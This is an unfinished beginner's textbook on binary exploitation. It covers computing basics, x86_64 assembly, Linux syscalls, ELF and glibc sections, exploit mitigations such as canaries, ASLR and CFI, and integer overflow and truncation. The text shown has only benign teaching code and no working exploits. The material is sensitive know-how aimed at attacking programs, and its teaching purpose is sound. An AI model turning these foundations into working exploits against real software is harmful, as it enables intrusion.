✝️ Matthew 16:24-26
Then Jesus said to his disciples, “Whoever wants to be my disciple must deny themselves and take up their cross and follow me. For whoever wants to save their life will lose it, but whoever loses their life for me will find it. What good will it be for someone to gain the whole world, yet forfeit their soul? Or what can anyone give in exchange for their soul?
# Written by stackpointer
## CHAPTERS
## [foreword](#foreword)
## [chapter negative three - Some Important Concepts](<#chapter negative three - Some Important Concepts>)
## [chapter negative two - Introduction to X86_64 Assembly](<#chapter negative two - Introduction to X86_64 Assembly>)
## [chapter negative one - Introduction to Linux and Some Tools](<#chapter negative one - Introduction to Linux and Some Tools>)
## [chapter zero - Introduction to ELF, glibc, and Some Extra Program Sections](<#chapter zero - Introduction to ELF, glibc, and Some Extra Program Sections>)
## [chapter one - Mitigations](<#chapter one - Mitigations>)
## [chapter two - Integer Issues](<#chapter two - Integer Issues>)
## [chapter three - Out of Bounds Reads and Writes](<#chapter three - Out of Bounds Reads and Writes>)
## [chapter four - Format String Fun](<#chapter four - Format String Fun>)
## [chapter five - Dangling Pointers](<#chapter five - Dangling Pointers>)
## [[#foreword]]
This book is meant to teach about binary exploitation from the ground up. This book assumes you know nothing about computers and starts from what they are to advanced binary exploitation techniques.
## [[#chapter negative three - Some Important Concepts]]
So, before we exploit our target, we must know our target. I will introduce you to some terms.
So let's start at the very basics… What is a computer? A computer is something that has a state and has rules that change the state. State simply means "what the computer contains"; it could contain number/s, letter/s, color/s, etc. The rules are simply "what the computer can do". So, by that logic, the following idea could be a computer: A box that stores a number with two rules. Rule one being that we can change the number in the box by 1, going in a positive and negative direction. Rule two being that once we try and bring the number below 0 the number gets set to 99. When we try and go above 99 the number gets set to 0.
Another example of a computer could be two boxes that store a number, with the rules being "we can add the number in box 1 by the number in box 2 and store it in box 1", "if the sum of the two numbers is bigger than 99, the number in box 1 gets set to 0 and the number in box 2 gets set to a random number less than 99 but greater than 0".
One final example of a computer could be a box that only stores a single letter with the rule being "if the letter is lowercase it gets changed into uppercase or if the letter is uppercase it gets changed into lowercase". Say the box holds the lowercase letter m, if the rule were applied the box would now contain the uppercase M. We can apply the rule again turning uppercase M into lowercase m. Note that this is just one rule but it may feel like two rules because the letter can be in two different states, and the rule reacts differently depending on the state. We could have that rule be split into two rules "if the letter is lowercase it gets changed into uppercase" and "if the letter is uppercase it gets changed into lowercase" but splitting it into two rules does not change how the computer behaves. It does not matter if there is one rule with two different possible outcomes or if there are two rules with one possible outcome, the computer's state still changes the exact same way.
There are many different ways to implement a computer in the real world. But in this book, when I refer to real world computers and their parts, I am talking about the x86_64 architecture. An architecture describes what rules the computer understands and how those rules change the state.
In the real world, computers must follow the same idea of rules and state. However, there are more rules and more states. In the real world, computers have a component to run the rules that affect the state, which is called the CPU. The CPU simply runs instructions (also called code) that change the state of the CPU or of other components, such as RAM.
RAM, which stands for random access memory, can be thought of as a bunch of identical boxes next to each other. Each box can store a number and each box is numbered starting at 0 instead of 1. For example, say you want the very first box, you would want box 0. The box after that is box 1, and so on. The computer also has other components, such as ROM, which means read-only memory. ROM can be thought of like RAM, but the values inside the boxes don't change. The CPU can load something from ROM into its own state or into RAM. There is the motherboard, which connects all the pieces of the computer together. There is a disk, which means permanent storage that stays the same even if the computer is turned off, unlike RAM. The keyboard is how we give the computer information one key press at a time, and the computer reacts to each press based on whatever rules it follows. The screen is how we see the information the computer sends back to us. The screen displays colors, shapes, letters, numbers, etc based on what the rules tell it to show.
Note that when I refer to memory in the rest of this book, I am referring to RAM.
The CPU has its own state in the form of registers, which can be thought of as small boxes that store numbers. Say the CPU wants to load something in RAM into one of its registers, the CPU would access a certain box in RAM by number and make the register's value equal to its value ("grab the value at box 777 and load it into this register"). The term address means the location of a box in RAM. For example, I could say "address 1337 holds the value 7", which means box 1337 in RAM holds the value of 7. A pointer is a register or a RAM location that holds an address. For example, I could say "this register points to address 1337," which simply means that the register's contents are equal to 1337, which is the address of a box. It is important to note that addresses and numbers are the same thing. An address just happens to be where a box is in RAM. The CPU can also copy a register's contents to RAM, for example say a certain register holds the value 7 and we want to write to address 1337, the CPU would simply copy the data in the register which is 7, to address 1337. So address 1337 would hold the value of 7.
The CPU has two very important registers, the instruction pointer which holds the address of the next rule to be ran, and the stack pointer which holds the address of the lowest element in the stack. The stack can be thought of as a stack of papers that starts on the ceiling and grows downward toward the floor. New papers get added right beneath the current bottom page, and papers get removed by taking that bottom page off.
It is important to note that the boxes (that RAM holds and what registers are) are called bytes, RAM is simply bytes next to each other, while registers are the same but registers are a part of the CPU's state. Each byte stores 8 bits, and a bit can either be a 0 or a 1. We can represent numbers with bits for example the number one with bits would be: 1, two would be: 10, three would be: 11, four would be: 100, five would be: 101, and so on. to represent the contents of a one byte equal to seven, would be like this 00000111. Bit notation is hard to read, so instead of looking at the value of a byte like: 00000111, we can look at it like this: 0x7. the 0x before the number means hex notation, hex notation is like our base 10 counting system but after 9 instead of 10 we have: 0xa, 0xb, 0xc, 0xd, 0xe, 0xf, and then we have 10. Hex is simply a base 16 counting system with a-f before 10. a byte can store the max value of 11111111 in bit notation, and in hex notation 0xff, and 255 in our normal human base 10 counting notation. Two bytes next to each other can store bigger numbers than 255, for example two bytes would store 1111111111111111 in bit notation, and in hex notation 0xffff, and in our notation: 65535, the more bytes the bigger the number. The CPU can access multiple bytes so instead of accessing just 10101111 we can access 1000000010101111, the CPU can grab the contents of address 0xffff (in bit notation 1111111111111111) (also remember an address can be thought of as the location of the byte in RAM), and load it into a register.
With real world computers, we access things by numbers as you saw with addresses, but everything inside the real world computer is also a number (yes, EVERYTHING!). Since everything on the x86_64 architecture is a number that includes characters. Characters are simply letters such as 's', 't', 'a', 'c', 'k', etc, numbers like 1, 2, 3, etc, and symbols like #, $, {, ), ], etc. Note that there is a difference between something like the character 7 and the actual number 7. The character 7 would be this in hex: 0x37, while the number 7 would be like this: 0x07. A string is simply a collection of characters that usually ends in 0.
A program is made up of named sections, which are groups of bytes that serve specific purposes. The .text section is where rules that modify state, called instructions (also called code), are stored. The .data section holds bytes that start off as specific values. The .bss section holds bytes that are set to 0. A program sits on disk simply as bytes, and can be copied into RAM so that the CPU can run those instructions and use the data. The program sections will usually be next to each other, however this isn't a guarantee, for example, there could be a gap between .text and .data. Note that the names of the sections don't matter really and can be named anything like .text can be called CODE, .data could be called GLOBALZ, etc.
A process is a program that’s been loaded into RAM where its instructions (the bytes inside .text) can be run by the CPU, and the process contains additional sections like the stack. A process also has its own state, which consists of its own CPU state plus all the bytes inside all of its sections. Note that processes keep the same distance between the original program sections, for example if .data is 0x1000 bytes after the end of the .text section in the program, it will stay the same distance apart in the process. The CPU does not run the entire process's .text section at once. The process runs for a short amount of time, then its state gets saved, and another process’s state gets loaded into the CPU. This is called a context switch, which is the act of processes having their state saved and restoring another's. The kernel controls all of this. It decides which process gets CPU time, which process runs next, when to context switch, etc. A process can exit itself, meaning that it stops running and gets unloaded from RAM. When a process exits, it gives the kernel something called an exit code, which is a number that is usually used to indicate how the process ended. An exit code of 0 usually means "Everything is fine! I exited because I am done", while any other number usually means something else happened.
A thread is a way to separate the work of a process, threads can be thought of as having their own CPU state and their own separate stack. A process running has 1 thread by default because of the CPU state + stack which is called the main thread, but its possible to have multiple threads each with their own state. So if a process has 2 threads, it would have 2 separate CPU states + 2 separate stacks. It is possible for threads to share memory with each other via sections like .data or .bss.
If two processes write and read to the same address things can get messy so luckily kernels implement something called virtual memory where both processes have the illusion of reading/writing to a certain address but in reality both of those processes access two different parts of RAM.
Virtual memory can be implemented in many different ways, one of the most popular ways its done is through something called paging. Each process has its own virtual address space which is a range of addresses (with gaps) where the process's contents will live. For example the virtual address space of a process might look like:
```
[0x0000-0x1000]
[0x1000-0x2000]
[0x7000-0x8000]
```
Note that every process has a base address, which is just where the program gets loaded in virtual memory.
The virtual address space is how the process views its own memory. However, these addresses are not where the process exists in RAM. A virtual address space is just where the process thinks it is in RAM but in reality the kernel translates each virtual address to a real location in RAM. Say the process writes 7 to virtual address 0x1337, the CPU won't actually write to that address in RAM. Instead, the kernel would look at a page table, which is basically a table that tells the CPU what physical address each virtual address should go to. When someone says "physical address" they mean the actual location in RAM, when they say "virtual address" they mean the address the process sees and uses inside its own virtual address space. Note that a process cannot read/write to any physical address, it can only read/write to an address inside of it's virtual address space.
The act of a process requesting a privileged operation such as adding a new section to itself, writing data to disk, etc is called a system call, which can be shortened to syscall, To perform a syscall certain registers must contain certain values for example say we want a new section for our process starting at virtual address 0x777, with a size of 0x1000, and one register would be set to be the location and another to be the size and then a syscall and another one being the syscall number would be done via a special instruction. When a syscall is performed, the CPU jumps saves the process's state and jumps into the kernel which has instructions based on that syscall number. After the syscall is finished the process's state is restored with the result of the syscall (like the virtual address of the new section) being loaded into the same register where we had the syscall number. There are certain instructions that only the kernel can run that a normal process cannot.
A file system is how the disk is organized, at the top there is a directory which can be thought of as a folder which stores files and other directories, a file is simply a region of disk with certain bytes and a name. Programs are files because they are on disk with a name and contents.
Say we have an instruction that grabs 4 bytes starting at address 0x7331 and loads them into a register. The way those bytes are stored is called endianness. The x86_64 architecture stores data in a format called little endian, meaning that the number would be stored backwards. The value 0x71337 stored in 4 bytes would look like this: ``[0x37][0x13][0x07][0x00]``. Big endian is the opposite of little endian meaning the numbers would be stored like we would expect, like this: ``[0x00][0x07][0x13][0x37]``. Note that endianness only applies to multi byte values if we were to store something like 0x7 at address 0x0, it would look like this for one byte: ``[0x07]``.
## [[#chapter negative two - Introduction to X86_64 Assembly]]
As you know all computers have rules and assembly is those rules written in a human format. That means every assembly instruction is a direct rule the CPU will follow. If you can read assembly you can understand how everything inside the computer works such as programs, the kernel, and even the computer itself. Each instruction changes the computer's state, for example say we move some data from a register into RAM or vice versa, that would be a state change. An instruction is made up of a mnemonic and arguments, the mnemonic is the name of the instruction and the arguments are what the instruction takes as input to do a task. One thing to note before I teach you x86_64 assembly is that the x86_64 architecture has a LOT of rules some with weird side effects. The registers that the x86_64 architecture has are: rax, rbx, rcx, rdx, rsi, rdi, rbp, rsp, r8, r9, r10, r11, r12, r13, r14, r15, rip, and rflags. Each of these registers can be split up into smaller chunks. For example, rax is a 64 bit (8 byte) register meaning that it's size is equal to 64 bits (or 8 bytes!), the bottom 4 bytes of rax are called eax, the bottom 2 bytes of eax are called ax, and the upper byte of ax is called ah, while the lower byte of ax is called al. The same concept applies for rbx, rcx, and rdx. The registers rsi, rdi, rbp, rsp, r8, r9, r10, r11, r12, r13, r14, r15 don't have an upper byte equivalent (such as ah, bh, ch, dh). However, they do have names for the lower 8 bits: sil, dil, bpl, spl, r8b, r9b, r10b, r11b, r12b, r13b, r14b, r15b. When you write to a 32 bit register such as eax the upper 4 bytes get set to zero unlike if you were to write to a 16 bit register such as ax, where the upper 48 bits will not get set to zero.
A label is a named location in memory that we can set the instruction pointer to or read/write to if said label is in the correct section. There are some special labels such as ``_start`` which is just the start of the .text section. To declare ``_start`` in assembly, we would do this:
```
global _start
_start:
[ASSEMBLY INSTRUCTIONS HERE]
```
Before declaring \_start, ``global _start`` must be declared.
To define a label we just type the labels name which can be anything we want followed by a colon, for example:
```
hello:
[ASSEMBLY INSTRUCTIONS HERE]
```
When working with memory in assembly, it is important to note that there are multiple ways to access/modify memory, you have to be explicit about how much data you want to access/modify. The different sizes are byte which is simply 8 bits, word, which is 2 bytes (16 bits), dword which is 4 bytes (32 bits), qword which is 8 bytes (64 bits). When used, these keywords tell the CPU how much memory to access/modify. To write a single byte to somewhere in memory we would do this:
```
mov byte [rax], 1
```
When the size is not specified the register size is automatically inferred via the register:
```
mov al, [rbx]
mov ax, [rbx]
mov eax, [rbx]
mov rax, [rbx]
```
The above instructions simply treats the value of rbx like an address in memory. Then the CPU grabs whatever data is at that address and copies it into the register.
Memory can be accessed in a certain way sometimes. For example, we can tell the CPU to get a value from memory using a register that holds an address, or we can mix registers and numbers. The general way to access memory looks like this: ``[base + index * scale + offset]``. Base is the address that points somewhere in memory. Index must be a register and is used like a counter. Scale is how much to multiply the index by (can be 1, 2, 4, or 8). Offset is a constant positive or negative number added to the address. You can leave out any part you don't need but you need at least one part.
The mov instruction simply copies data from one place to another. For example, ``mov rax, rbx`` copies the data from rbx into rax, making rax have the same value as rbx. ``mov rax, [rbx]`` means treat rbx as a pointer and grab whatever is at the address and copy it to rax. So say in RAM address 0x1337 holds the value 7 and rbx is equal to 0x1337 the above operation would result in rax's value being equal to 7. The register rax could also be treated as a pointer so we would be writing to the address that rax holds ``mov [rax], rbx``.
For every instruction, the sides can be a register and a register, a register and a number, an address and a register, or an address and a number. If we have an instruction that stores data into one of the arguments, it will store data into the first argument, and that first instruction must be a register or an address. The second argument can be anything besides an address if the first argument is an address. So for example we can do stuff like:
```
mov rax, 0x1337
mov byte [rax], 0x77
mov rbx, 0x7331
mov qword [rbx], rax
```
We cannot have an instruction where we store data into a number. For example we cant have this:
```
mov 7, al
```
The add instruction takes adds the two elements together and stores it in the first element in the instruction, for example ``add rax, rbx``. Like mov, add can be used with memory addresses. The sub instruction is like the add instruction but instead of adding, it subtracts. We will cover the multiplication and division instructions later. An important thing to note is that the x86_64 architecture does not support any instruction that has all the arguments as addresses, at least one argument must be a register or a normal number.
We have the inc instruction which adds things by 1 and the opposite of that would be the dec instruction.
A bitwise operation is an operation that performs a logical operation on the bits of an element. The logical operation could be and, or, not, xor, test. The and instruction takes two arguments and checks each bit in them. If both bits are 1, the result will be 1, if the bits arent both 1 the result will be 0, and stores the final result in the first argument, for example:
```
mov eax, 12
and eax, 5
```
the result will be 4 because 12 the bits look like this:
```
1100
0101
```
The or instruction is like and, but if there is a 0 and 1, the result will be 1. The not instruction takes 1 argument and flips the bits. The xor operation is like or but if both bits are 1 the result is 0. The test instruction performs a bitwise and on the 2 arguments, but does not store the result in any of the arguments, however it sets the rflags register. Note that for these bitwise operations, the first argument must be a register or an address, the next argument can be anything. Remember, both arguments cannot be an address.
The rflags register is a register that keeps track of the results of previous operations. Each bit in the rflags register is tied to a result. For example if the result of an operation was 0 such as:
```
xor eax, eax
```
The zero flag (ZF) would be set. If the result was a negative signed number (we will cover signed numbers later) the sign flag (SF) would be set. The carry flag (CF) would be set if there was an unsigned under/overflow (we will cover those later). The overflow flag (OF) would be set if there was an signed under/overflow (we will cover those later). The parity flag (PF) would be set if the lower byte of a result has an even number of 1s.
The rsp register is the stack pointer on x86_64, speaking of the stack, to push 8 bytes onto the stack, you would do this:
```
push 7
```
Which would push the number 7 as 8 bytes onto the stack: ``[07][00][00][00][00][00][00][00]``. Note that the thing you're pushing on the stack must be a number, an address, or a register and the size must be 64 bits if it is an address or a register, if it is a number it is inferred to be 64 bits.
To remove 8 bytes from the stack and pop the data that was on the stack into a register or into memory this would be done:
```
pop rax
```
or
```
pop qword [rax]
```
Note that you need to have an explicit size when you are popping data off the stack that must be a qword. You can also make space on the stack with the sub instruction:
```
sub rsp, 5
mov byte [rsp], 'h'
mov byte [rsp + 1], 'e'
mov byte [rsp + 2], 'l'
mov byte [rsp + 3], 'l'
mov byte [rsp + 4], 'o'
add rsp, 5
```
As you can see, the add instruction is being used to restore the stack pointer to it's original value. You can also see we can refer to actual characters by surrounding them with the ``'`` character.
As you know the instructions will be in the .text section of the program, but you can also put data in the .data, .bss, .text, and other sections. Data that can be accessed anywhere in the program with a name is called a global. For example to define a byte with a name that can be accessed from anywhere within the program we would do this:
```
mov eax, [rel hi]
hi db 0
```
In this context, hi is a global. We are moving the value of hi which is 0 into eax, hi may be a global but in reality that global corresponds to a memory address. We can define globals with different sizes for example a 5 byte global would be like this:
```
hi db 0, 7, 3, 3, 1
```
Since globals are just memory addresses, you can define data at said address.
You can also define globals like this:
```
hi times 100 db 0
```
Which would create a 100 byte global with all the bytes set to 0. There are different ways to define the size of a global, for example there is db which means define byte, dw which means define word, dd which means define double word, dq which means define quad word. The rel keyword accesses the global relative to the instruction pointer instead of it's raw address. Using rel is better than accessing the raw memory address because of many reasons such as ASLR which I will cover later. For the love of God please use rel with globals! To load the address of a global into a register, we would simply do this:
```
lea rax, [rel SOME_GLOBAL]
```
The lea instruction copies the data inside of the ``[]`` into a register without treating the contents as an address and grabbing the value there.
To check if two values equal each other you can use the cmp instruction followed by a jump to a label if the condition was true or false. For example:
```
cmp byte [rax + 7], 0x73
je jump_to_this_label_if_true
```
The first argument of the cmp instruction, must be a register or an address, the next argument can be anything, but remember both arguments cannot be addresses.
The above instructions check if the value of the data at rax which is being treated as an address plus 7 is equal to 0x73, and if it is equal the instruction pointer is set to the label jump_to_this_label_if_true. There are a lot of different jumps conditions you can do such as: if these two values equal each other (je) or (jz), are not equal (jne) or (jnz), is less than (jl or jb), is greater than (jg or ja), is less than or equal to (jle or jbe), is greater than or equal to (jge or jae), and jumps on if a flag is set or not. To jump anywhere no matter what the jmp instruction is used, for example:
```
loop_forever:
jmp loop_forever
```
We can define globals in different parts of the programs section, for example:
```
section .data
data_global dd 1, 2, 4, 8
section .bss
bss_global resb 10
```
The resb "instruction" just reserves a certain amount of bytes to use and doesn't set them to be anything. The res/b/w/d/q, d/b/w/d/q, and times instructions aren't actual instructions that the CPU understands, but they are there to reserve space and are understood by the assembler to reserve space (I will explain what an assembler is later).
A function is just a bunch of instructions that ends in a ret instruction or an exit syscall (which we will cover later). Say we have the following instructions:
```
global _start
section .text
add_three_numbers:
add rdi, rsi
add rdi, rdx
mov rax, rdi
ret
_start:
xor edi, edi
xor esi, esi
xor edx, edx
mov dil, [rel GLOBAL_BYTE]
mov sil, [rel ANOTHER_GLOBAL_BYTE]
mov dx, [rel GLOBAL_WORD]
call add_three_numbers
add rbx, rax
[MORE ASSEMBLY INSTRUCTIONS HERE]
section .data
GLOBAL_BYTE db 17
ANOTHER_GLOBAL_BYTE db 38
GLOBAL_WORD dw 7
```
First of all, rdi, rsi, and rdx are all set to 0. Next, the contents of GLOBAL_BYTE will be loaded into dil, the contents of ANOTHER_GLOBAL_BYTE into sil, and the contents of GLOBAL_WORD into dx. Then we have the call instruction which pushes the instruction pointer on the stack (in this case it is going to be the virtual address where ``add rbx, rax`` is), and the instruction pointer is set to the address that we wanted to call (in this case it is add_three_numbers). The contents of rsi and rdx are added to the contents of rdi, we make the contents of rax equal to the contents of rdi. Then we have the ret instruction which pops the thing onto the top of the stack into the instruction pointer (in this case it is the virtual address where ``add rbx, rax`` is).
Since registers can hold addresses you can jump or call a register like this:
```
global _start
section .text
add_two_numbers:
mov rax, rdi
add rax, rsi
ret
_start:
add rsp, 8
mov edi, 7
mov esi, 8
mov rax, add_two_numbers
call rax
mov rax, _start
push rax
jmp [rsp]
```
You can also do the following:
```
global _start
section .text
add_two_numbers:
mov rax, rdi
add rax, rsi
ret
_start:
mov edi, 7
mov esi, 8
mov qword [rel some_global], add_two_numbers
call [rel some_global]
mov qword [rel some_global], _start
jmp [rel some_global]
section .data
some_global dq 0
```
The above examples are of an indirect call and indirect jump which is when a call or jump happens on a register or through a pointer. The ``ret`` instruction performs an indirect jump since it pops off and jumps to whatever is on the top of the stack.
Say we have the following instructions:
```
global _start
section .text
_start:
mov eax, [rel BYTE00]
section .data
BYTE00 db 1
BYTE01 db 3
BYTE02 db 3
BYTE03 db 7
```
Since the size is inferred to be 4 bytes because eax is 4 bytes wide, after the mov instruction, eax would be set to not just the contents of BYTE00 but it would contain the contents of BYTE00 to BYTE03. If we wanted to make eax ONLY equal to BYTE00 we could set eax to 0, and load BYTE00 into al. Or we could do this:
```
movzx eax, byte [rel BYTE00]
```
or
```
movsx eax, byte [rel BYTE00]
```
Which would only copy the contents of BYTE00 over. We will cover movsx and movzx in more detail later. Note that we cannot do something like this:
```
mov eax, byte [rel BYTE00]
```
We can set the lower byte of a register or a byte of memory to 0 or 1 based on a condition.
```
cmp al, 7
setae byte [rel SOME_BYTE]
```
In the next chapter, I will show you how to take your assembly instructions and actually build a real Linux program from it.
## [[#chapter negative one - Introduction to Linux and Some Tools]]
An assembly file is simply a file that contains assembly instructions and instructions on how said file should be organized , for example:
```
global _start
_start:
mov edi, 7
mov eax, 60
syscall
```
Note that the syscall instruction does exactly what I explained in chapter -3, it performs a system call with rax being used to specify which syscall is which. Since rax is holding 60, in this case it means that the exit syscall will be performed. The exit syscall simply stops the CPU from running the process and unloads the process from RAM.
The syscall you want should be stored in rax, the arguments of the syscall are stored in this order: rdi, rsi, rdx, r10, r8, r9, and on the stack.
Linux has many syscalls such as read, write, open, ptrace, etc. Some of which we wont cover in this book.
An assembler is a program that turns an assembly file into an object file. An object file can be thought of as a half finished program, it contains the actual state modifying rules and the names of the labels and functions, but not where any of them will be in memory. The linker turns an object file into an actual program by deciding where everything should go which turns the object file into a real program.
Linux is a kernel that has a bunch of tools written for it.
(TODO!)
(LAB SETUP HERE AND INTRODUCTION TO WHAT A TERMINAL IS, WHAT GDB IS, ETC)
(TODO!)
To assemble and link your first object file to create a program, type the following command in your terminal: ``cd ~/labs/first_steps; nasm -f elf64 first_steps.asm -o first_steps.o; ld first_steps.o -o first_steps``.
Linux gives you syscalls to do privileged operations, but sometimes using those syscalls is annoying, and that is why glibc was invented.
Glibc is a collection of functions that any program can access when they need to do things such as read a file, manage memory, write an unspecified amount of characters to a file, etc.
Alignment means certain things in memory have to start at an address that is divisible by a certain number, for example some glibc functions require the stack to be aligned by 16 bytes.
An example of a program that uses glibc is as follows:
```
extern puts
global main
section .text
main:
lea rdi, [rel example]
call puts
ret
section .data
example db "This is an example!", 0
```
Code that uses glibc must use main instead of \_start. To assemble and link this we would do this:
``cd ~/labs/glibc_example; nasm -f elf64 example.asm -o example.o; gcc -no-pie example.o -o example``.
Note that strings are enclosed by the `"` character. The above code would simply write each byte in example (besides the last one) of the string to a special file called stdout. Note that stdout is a special file because we can see it's contents directly on the computer screen. Stdin is where we can actually enter keyboard data. the extern part says "hey assembler! We want to use this certain glibc function."
When a program calls a function or jumps to a label, it doesn't jump to the name it jumps to the location, however the names of those functions and labels will still be stored inside the program. To remove those names you can use a tool called strip, which simply removes the names: ``strip example``.
One final thing to note is how glibc functions expects arguments to be stored, glibc expects arguments to be stored like this: rdi, rsi, rdx, rcx, r8, r9, and on the stack.
An example of the write syscall is as follows:
```
sub rsp, 4
mov byte [rsp], 'n'
mov byte [rsp + 1], 'i'
mov byte [rsp + 2], 'c'
mov byte [rsp + 3], 'e'
mov edi, 1
mov rsi, rsp
mov edx, 4
mov eax, 1
syscall
add rsp, 4
```
We simply write "nice" to stdout. In the above code, we make space on the stack to store the string "nice", we then set rdi to 1 which means "write to stdout", we set rsi to rsp, which holds the address of the string "nice", we set rdx to 4 which is the number of bytes we want to write, we set rax to 1 which is the syscall number for write and we run the syscall instruction. Finally, we restore the stack pointer to its original value.
An example of the read syscall is as follows:
```
sub rsp, 4
xor edi, edi
mov rsi, rsp
mov edx, 4
xor eax, eax
syscall
add rsp, 4
```
We simply read a maximum of 4 bytes from stdin. In the above code, we make space on the stack, we set rdi to 0 which means "read from stdin", we make rsi equal rsp, which will hold the data we entered, we set rdx to 4, which means a maximum of 4 bytes to read, we set rax to 0 which is the syscall number for read and we run the syscall instruction. We then restore the stack pointer to its original value.
## [[#chapter zero - Introduction to ELF, glibc, and Some Extra Program Sections]]
As you know, a program is made up of different sections and there are some additional sections the program gets when it uses glibc functions, the additional sections are the .plt and .got sections.
The .plt section is used when the program wants to call a glibc function. Each glibc function has its own small set of instructions inside the .plt. The first time a glibc function is called, the .plt instructions jump to other instructions in the program that result in the virtual address of that glibc function being written into a spot in the .got section, which is used to hold the virtual addresses of glibc functions. After that setup is finished, future calls to the same glibc function skip the setup and jump to the address stored inside the .got section.
It is important to note that the sections of a program have different permissions meaning different rules apply to them. A section can have the read rule which means that bytes from said section can be loaded from it into a register or a different section in the program, the write rule that means data can be loaded into said section, finally we have the execute rule that means a section can be treated like a bunch of instructions which can be ran.
One final thing to note is that every process has a unique number, called the process id (PID) that the kernel gives it so it knows which process is which.
An example of a program using a syscall to print a message to the screen and another syscall to exit with a code of 7:
```
global _start
section .text
_start:
mov edx, 14
lea rsi, [rel hello]
mov edi, 1
mov eax, 1
syscall
mov edi, 7
mov eax, 60
syscall
section .data
hello db "Hello reader!", 10, 0
```
To assemble and link the assembly code into a program you would do this: ``nasm -f elf64 example.asm -o example.o; ld example.o -o example``. To do the same thing but with glibc instead of syscalls:
```
extern puts
extern exit
global main
section .text
main:
lea rdi, [rel hello]
call puts
mov edi, 7
call exit
section .data
hello db "Hello reader!", 0
```
To assemble and link the assembly code into a program you would do this: ``nasm -f elf64 example.asm -o example.o; gcc -no-pie example.o -o example``.
## [[#chapter one - Mitigations]]
A vulnerability is when a program lets you do something that the original programmer never intended for example, Say we have a video game where if you die, you drop your items, however, say you die and your items don't drop. That would be a vulnerability because it was never intended to happen.
Before covering different types of vulnerabilities I am going to cover mitigations which make them either harder or impossible.
Starting off strong we have the stack canary, which is a group of bytes that sit before the return address, these bytes are checked to see if they changed before a function return and if they changed, the process will exit.
The shadow stack is a stack that stores return addresses and the top element of the shadow stack is compared against the top element of the stack during a function return, if they do not match the program will exit, a shadow stack can be implemented in software or hardware.
Control flow integrity (CFI) is a series of techniques that only allow compiler approved indirect calls/jumps, an example of CFI, called indirect branch tracking (IBT) is to place an endbr64 instruction at the beginning of every valid indirect call/jump target. If an indirect call/jump doesnt land on an endbr64 instruction, the process will exit. CFI also stops the process from returning to a non approved location via a hardware shadow stack. Intel CET can be thought of as IBT + a hardware shadow stack.
\_FORTIFY_SOURCE adds compile and runtime checks to unsafe libc functions calls.
RELRO makes the program's GOT read only after the first relocation.
Position independent executable (PIE) tells the kernel, when loading a program into memory, to not put it at the same virtual address every time it becomes a process. PIE only changes where the program gets mapped into virtual memory, not the distances between its sections. If a program does not have PIE enabled, an attacker would know where the process is in virtual memory all the time.
Address space layout randomization (ASLR) makes it so sections of a process are loaded at semi random virtual addresses. Note that ASLR keeps the 12 lower bits the same for that section base. ASLR also works with PIE to randomize where the start of the process is, and also randomizes other sections of the process such as the stack.
(Non executable) NX means that the stack cannot be treated as instructions and be executed.
Note that these mitigations are not always present, but most of the time are on real programs.
## [[#chapter two - Integer Issues]]
Numbers can be treated in two ways in the x86_64 architecture, unsigned which means every bit in the number is used to represent the number. For example say we have this unsigned byte: 11010101, all the bits in that byte are used to represent the number. There are no negatives in unsigned numbers just anything equal or greater than 0. Signed means the top bit is used to represent if the number is negative or positive, while the other bits represent the number: 00000001 would be 1 however 11111111 would be -1, 10000000 would be -128, 01111111 would be 127, so a signed byte will be in the range -128 to 127. The CPU doesn't care if something is signed or unsigned, however it is up to the instructions on how to interpret numbers.
Integer truncation happens when you try to store a value that’s bigger than the byte(s) it’s being placed into. The CPU keeps only the byte(s) that fit and cut off the rest. For example, say we have a 4 byte value 0xaabbccdd and we try to store it inside of 2 bytes. Only 0xccdd would be stored inside those 2 bytes, because 0xaabbccdd is too big to be stored inside 2 bytes so the bytes that can't fit are cut off. The following code snippets are examples of integer truncation:
```
sub rsp, 2
mov eax, 0xAABBCCDD
mov word [rsp], ax
add rsp, 2
```
```
mov eax, 0x13377331
mov bx, ax
```
Zero extension happens when a smaller value is moved into a larger group of bytes. The extra bytes above the original value are filled with zeros. For example say we make the ``eax`` register equal to ``byte [rsp]`` zero extended. We would do this: ``movzx eax, byte [rsp]``.
Sign extension is like zero extension but instead of filling the bytes above the original value with zero, they are filled with what ever the sign bit is (0 or 1). Say ``byte [rsp]`` stores a 0x81, since the left most bit of the number is 1, the number will be treated as negative. If we did: ``movsx eax, byte [rsp]``, eax would be set to 0xffffff81.
Also, do not forget that since we wrote to eax, the upper 4 bytes of rax will be zeroed out no matter what, even if a sign extension was done. For example: ``movsx eax, byte [rsp]`` sets the lower 4 bytes of rax to 0xffffff81, however the upper 4 bytes will be set to 0.
You can think of integer overflow like a clock, however there are two kinds of clocks the real kind which is the unsigned one and the signed one which is the fake one. If the number is unsigned and increases above the maximum possible value for its byte size, the number wraps around to 0 and can continue increasing from there. If the number is signed and increases above the maximum possible value for its signed size, the number wraps around to the smallest possible value it can be and can continue increasing from there. The reason why the unsigned variant is the "real clock" is because of the fact that it actually overflows, unlike a signed number which gives the illusion of an overflow. Integer underflow is like integer overflow but instead of going up and wrapping to the smallest value and beyond, we go down and wrap to the biggest possible value and below.
Say we have an unsigned byte 0xff, if we add that byte by 1 it would become 0, if we added it by 2 instead of 1 it would become 1. Say we have a signed byte 127, if we add it by 1 it would wrap around to its minimum negative number which is -128 but in reality would be equal to 0x80 so its an illusion because its not physically wrapping around, if we added it by 2 instead of 1 it would become -127. Note that when an unsigned overflow/underflow occurs the CF (carry) flag is set, during a signed overflow/underflow OF (overflow) flag is set. So a program could check if something under/overflowed via those 2 flags, however it is important to remember flags change a lot because other instructions will overwrite them so it's best to check them immediately:
```
add eax, 7
jc unsigned_overflow
jo signed_overflow
```
```
sub eax, 77
jc unsigned_underflow
jo signed_underflow
```
Or if you need the result later you can save the flag with setc/o:
```
add eax, 7
setc bl
seto cl
```
